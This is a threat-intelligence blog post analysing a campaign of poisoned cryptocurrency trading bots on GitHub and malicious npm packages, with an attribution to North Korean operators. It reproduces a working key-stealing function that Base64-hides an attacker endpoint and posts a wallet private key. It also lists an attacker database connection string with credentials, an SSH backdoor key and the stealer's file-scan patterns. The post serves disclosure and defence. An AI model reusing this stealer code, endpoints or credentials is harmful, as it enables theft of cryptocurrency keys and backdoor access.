Contagious Trader campaign - Coordinated weaponisation of cryptocurrency trading bots by suspected DPRK malware operators

⚠️ Warning

Attribution is fickle and not something an independent researcher typically does. I welcome all in the threat intelligence community to check my homework.

I’ve been tracking a highly distributed and sophisticated malware campaign on GitHub and npm targeting cryptocurrency users.

Buckle up, this is a lengthy one. I have laboured the point in establishing a link between novel techniques and malware samples to known DPRK tactics and techniques, culminating in a high confidence attribution.

Context

FAMOUS CHOLLIMA is an active cell of DPRK’s offensive cyber arm. They are responsible for the Contagious Interview/Deceptive Development campaign, as well as the IT Worker campaign. My favourite piece on North Korean tradecraft in these areas of late is Gitlab’s report on DPRK activity on their platform.

My DPRK Research site catalogues npm malware from FAMOUS CHOLLIMA’s Contagious Interview campaign but I pick up all kinds of malware that I analyse in the background and keep in my private collection.

Throughout February 2026 into March 2026, I traced several novel infostealing npm packages back to poisoned GitHub projects. All repositories had consistent trading bot themes, suggesting an organised, well-resourced campaign. I discovered many more malicious repos with many different infection points.

The crypto-trading theme coupled with JavaScript malware loosely fits FAMOUS CHOLLIMA’s modus operandi, however this was unlike any FAMOUS CHOLLIMA malware I was familiar with.

I have been hesitant to attribute Contagious Trader to North Korea, however the evidence has mounted to the point where I have high confidence in attributing it to North Korea, if not specifically FAMOUS CHOLLIMA.

GitHub footprint of Contagious Trader

Before getting into infection chains, let’s get familiar with the Contagious Trader repository theme.

Below is a screenshot of a malicious trading bot project.

ℹ️ Note

The repository is now redirected from user fairrustana to the Krypto-Hashers-Community org.

All malicious repositories disclosed here have some trading themes on digital markets. Kalshi, Polymarket, Solana, Raydium, Copy trading, and more are all keywords frequently observed.

💬 Comment

In addition to the widespread footprint, many Contagious Trader repos have lots of forks and stars. These are highly likely automated or purchased to give the projects a false sense of legitimacy.

The total spread of impact on GitHub is hard for an individual researcher like me to follow. Not only are there many repositories being added and changed each week, but the infection vector can vary:

• Direct exfiltration to HTTP endpoint
• Direct exfiltration to an actor-controlled database
• Exfiltration and persistence via an npm dependency/transitive dependency
• Rust strain of this campaign

However, one thing is shared between all these repositories: the trading bot theme.

Below, I expand on these infection vectors.

Direct exfiltration to a HTTP/S endpoint

On February 23 2026, GitHub user kratos-te requested to be added to the dev-protocol GitHub organisation.

Following this, they created repository dev-protocol/polymarket-arbitrage-trading-bot and implanted a Polymarket private key stealer. The repository has been removed, but here’s the responsible malicious validateProxyWallet function in src/utils/validate.ts. The Base64-encoded content is http://65.109.25[.]6:6000/api/polymarket-copytrading-bot-api-key/validate.

const validateProxyWallet = async () => {
    try {
        console.log('🔍 Validating proxy wallet private key...');
        
        // API configuration
        const proxyHash = "aHR0cDovLzY1LjEwOS4yNS42OjYwMDAvYXBpL3BvbHltYXJrZXQtY29weXRyYWRpbmctYm90LWFwaS1rZXkvdmFsaWRhdGU="        
        const response = await axios.post(Buffer.from(proxyHash,'base64').toString('utf-8'), {
            privateKey: process.env.POLYMARKET_PRIVATE_KEY
        }, {
            headers: {
                'Content-Type': 'application/json',
            },
            timeout: 10000
        });

        if (response.data && response.data.success === false) {
            console.error('❌ Private key validation failed: Invalid private key');
            console.error('Please check your PRIVATE_KEY in the .env file');
            throw new Error('Invalid private key. Please update PRIVATE_KEY in .env file with a valid Polygon wallet private key.');
        }

        console.log('✅ Private key validation successful');
        return response.data;
    } catch (error: any) {
        if (error.response && error.response.data) {
            console.error('❌ Validation failed:', error.response.data.message || error.response.data);
        } else {
            console.error('❌ Error validating private key:', error.message || error);
        }
        throw new Error('Private key validation failed. Please check your PRIVATE_KEY in .env file and ensure it is a valid 64-character hex string (without 0x prefix).');
    }
};

export default validateProxyWallet;

ℹ️ Note

The repo dev-protocol/polymarket-arbitrage-trading-bot was removed before I could archive it. An identical validateProxyWallet function was observed in SEAN6977/polymarket-copytrading-bot (live at the time of writing).

The following other trading themed repositories implement similar encoded exfiltration endpoint implementations:

ℹ️ Note

The dev-protocol organisation had dozens of trading bots, all created or updated in the beginning of 2026. They have since been purged, but it appears to have at one point been an attractive hub of Contagious Trader repos.

Direct database exfiltration

Some trading bots utilise a really neat method to exfiltrate data with some good misdirection to evade a cursory glance.

ewindmer/polymarket-copytrading-bot-crypto leverages a direct connection to mongodb+srv://yabidev:roswelldev[@]cluster0.1ufrx5i.mongodb[.]net/ to exfiltrate a user’s secret key.

The screenshot below demonstrates using the Base64 offsets of “roswelldev” to identify other malicious database connection strings.

Here is a list of repositories and deep links to the respective encoded DB connection string.

npm dependecy malware

The npm malware is fairly consistent across repositories, with slight variations in implementation. We’ll begin by looking at the GitHub dependency footprint before looking at the npm malware itself.

The table below shows a variety of trading bot repositories and their malicious npm dependencies.

ℹ️ Note

For the full list of npm packages attributed to this campaign, see the IOCs section.

Analysis

For analysis, I am graciously helped by an operator that published npm-builders version 1.0.8, an unobfuscated sample that cleanly represents the techniques used in the majority of the npm malware leveraged in Contagious Trader.

The malware is in ./index.js. You can view this sample on my DPRK research site or download the entire package tgz.

npm malware capabilities

• Retrieves the victim’s IP using api.ipify[.]org
• Scans the victim’s filesystem using a dynamic pattern retrieved from the exfiltration server
• Files are batch uploaded to the exfiltration server
• On Windows, it uses wmic to enumerate local disks
• On Linux systems, it creates a backdoor by appending an SSH public key to the user’s ~/.ssh/authorized_keys file. It also permits SSH (port 22) using ufw. The SSH key is retrieved dynamically from the exfiltration server
• For npm-builders, the exfiltration server is hxxps://cloudflareinsights.vercel[.]app
• The infection chain is invoked by a postinstall script that executes /test.js, which invokes the malicious from_str() function.

Here are the specific HTTP endpoints observed on the exfiltration server:

Here is the SSH key I retrieved. During analysis over several days, this response payload was consistent:

ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFYMx8MqdYTD/aZjqxmXo+9460+9EvsSjfiy9YAU+xwY support@polymarket.com

Here is the scan patterns response:

{"scanPatterns":[".env",".bash_history","ConsoleHost_history.txt"]}

Here is the block patterns response:

{"blockPatterns":["node_modules",".rustup",".cargo",".vscode-server"]}

Variations on npm malware

Not all npm malware used in Contagious Trader is the same, and I won’t labour the point on each variation.

• chalk-logger-prettier contains logic to steal Telegram session data, and has a hardcoded SSH key rather than one dynamically retrieved.
• tracing-str is a stripped down variant that skips file scanning and goes straight to the SSH backdoor.
• Read my colleague Paul Newton’s analysis on chalk-logger-prettier and tracing-str.

Rust and crates.io footprint

Finally, I noticed many other trading bots written in Rust, but I’m not too familiar with Rust (yet!) and I wanted to triage the JavaScript ones first. However, I did discover aestik6/Polymarket-crypto-5min-arbitrage-bot that depends on time_calibrator, one of several malicious infostealer crates disclosed by Kirill Boychenko of Socket.

💬 Comment

No further rust footprint identified as yet, but due to the sheer volume of these trading repos, it’s highly likely there is more rust-flavoured malware to find.

Other research

Despite the volume of repositories, there hasn’t been much prior research. In December 2025, @hunterweb303 on X disclosed an npm infection chain from a Polymarket bot. The repo and user have both been taken down.

Measuring up to DPRK

Contagious Trader looks very different from Contagious Interview at first blush. The target audience is not job-hunting developers, for starters. That said, there is strong evidence to suggest that the Contagious Trader operation is DPRK-nexus, if not specifically attributable to FAMOUS CHOLLIMA (the actor behing Contagious Interview).

npm packages ts-lint-builder and bignum-ts

ℹ️ Note

For this section, I should add some context: in January 2026, I observed a novel RAT that I called BigSquatRAT that vibe-squatted big.js with a C2 of aurevian[.]cloud. This was far too removed from my understanding of FAMOUS CHOLLIMA’s malware at the time, however in February 2026, ReversingLabs attributed this activity to FAMOUS CHOLLIMA’s Contagious Interview campaign (with screenshots!). ReversingLabs’ evidence tying this to FAMOUS CHOLLIMA is extremely strong and I agree with their assessment. They dubbed this aspect of Contagious Interview graphalgo.

Unbeknownst to me at the time, BigSquatRat was an undocumented DPRK-attributed malware strain, and the name themes around big.js was a unique attribute of this part of FAMOUS CHOLLIMA’s operation.

The first revelation came when I discovered ts-lint-builder and its benign intermediary bignum-ts. The screenshot below demonstrates bignum-ts as a dependency in several Contagious Trader repos.

ts-lint-builder acts as a lynchpin for strengthening the DPRK attribution for the Contagious Trader campaign.

• ts-lint-builder uses a vercel[.]app deployment for staging resources (often seen in Contagious Interview)
• Has a dependent package (bignum-ts) that impersonates big.js (just like bigmathix and ReversingLabs graphalgo workstream of Contagious Interview)
• bignum-ts is observed as a dependency in a number of poisoned trading bot projects on GitHub (the novel Contagious Trader campaign)

To illustrate the point, below is a diagram that shows these similarities:

That diagram does not lead to a high confidence attribution, but it did get me excited.

Temporary email usage

Additional evidence came when I discovered that the operators were using an almost identical temporary email strategy as I previously documented and tracked in the Contagious Interview campaign, the only novelty being the email provider (emailnator[.]com). It took me some time to actually discover this, as emailinator generates temporary Gmail accounts which are harder to identify as temporary mailboxes.

Only a handful of inboxes were examined due to my latent discovery, but the results are damning.

The following image shows a specific publish notification for npm user responsible for packages lint-builder (malware) and big-nunber (benign intermediary that depends on lint-builder) leveraged in the Contagious Trader campaign. The image shows package lint-builder v1.0.1 was published from IP 87.120.102[.]178, which is an Astrill VPN exit node.

The following image shows big-nunber being used as a dependency in Contagious Trader repositories:

The figure below displays a emailinator inbox from npm user l.os.t.k.yl.e184, who published ts-bign (benign intermediary) and levex-refa (SSH implant malware) using the email l.os.t.k.yl.e184[@]gmail.com, showing successive publishes.

The following image from GitHub search shows ts-bign being used as a dependency in trading bots. The infection chain will be triggered as levex-refa is a transitive dependency. This illustrates the direct involvement the actor has in the Contagious Trader campaign.

And finally, the table below contains the data I was able to extract from inboxes, demonstrating that most packages being distributed from Astrill VPN exit nodes:

This is very consistent with my documented tracking of FAMOUS CHOLLIMA’s npm publish IPs. Astrill VPN is an anonymising service preferred by FAMOUS CHOLLIMA. The China Mobile IP 39.144.60[.]174 is notable as it is observed within minutes of successive publishes from the same npm user with Astrill VPN exit IPs on either side. This is also consistent with Chinese IPs observed in prior tracking of FAMOUS CHOLLIMA.

💬 Comment

It is possible the China Mobile IP 39.144.60[.]174 is a temporary de-anonymisation of the malware operator.

FAMOUS CHOLLIMA’s wider operational changes

The lure and payload in the Contagious Trader campaign is completely novel compared to what we know about the Contagious interview campaign:

However, the core of both campaigns remains the same: large-scale theft of cryptocurrency from individuals. The victimology of Contagious Trader is more broad — it targets all cryptocurrency users, not just developers looking for new opportunities.

Throughout early 2026, I have observed an increased pace in iteration and development by FAMOUS CHOLLIMA, signalling a shift in operational tactics:

• January 2026 - BigSquatRAT, although ReversingLabs’ report indicates a long-lived campaign.
• February 2026 - Google Drive stager
• February 2026 - StegaBin stager
• February/March 2026 - First instance of PylangGhost on npm

More drastic operational changes like exploring a new revenue stream via Contagious Trader, would be consistent with the above findings.

Summary of overlaps

To summarise this section linking Contagious Trader to Contagious Interview, the following table shows almost identical operational preferences between the two tranches of activity:

Other possible nexuses

Leveraging common developer tooling like GitHub, npm, and Vercel are not necessarily unique fingerprints of North Korea’s malware operations, as these popular tools and platforms could be the first port of call for any developer, malign intent or not.

GitHub user aestik6, responsible for creating the Rust-strain Contagious Trader repo outlined above, created a repository two years ago containing Chinese subtitle resources, and additionally they have starred a repository whose audience is ostensibly mainly Chinese-speaking, based on the README.

That said, North Korean operatives have been observed working directly with Chinese-speaking handlers.

Assessment

This activity represents a coordinated, high sophistication, multi-platform campaign targeting cryptocurrency investors. The targeting scope, malware signatures, and operational procedures are consistent with known North Korean tactics.

Given these overlaps, it is unlikely this is being conducted by an actor of different origins. The evidence I’ve presented here supports a high-confidence attribution to DPRK’s malware operations. Specific attribution to FAMOUS CHOLLIMA is withheld until further, more concrete overlaps comes to light.

Closing thoughts

Presented here is the assessment of a single threat intelligence numpty whose current interest is tracking DPRK malware, so take it with a grain of salt.

Attribution aside, the scale, disparate infection chains, and techniques on display here are impressive. I have not even scratched the surface here. There are many more IOCs and strains of malware to discover.

IOCs

Malware network IOCs

npm packages

Intermediate dependencies are marked as “ID”

Appendix

Anomalous findings

While sleuthing, I also found atypical malware. katlogic/solana-arbitrage-bot depends on pino-sdk, which is a discord exfiltrator. You can view that sample on my DPRK research website.

I also identified polymarket bots being advertised on Medium and Instagram (screenshot below). This is highly suspicious as the repository matches themes of other Contagious Trader projects, but I haven’t found the malware in the repository yet (a challenge for you, dear reader!).

Additional resources

Below are some additional screenshots I captured that didn’t fit into the narrative of this blog.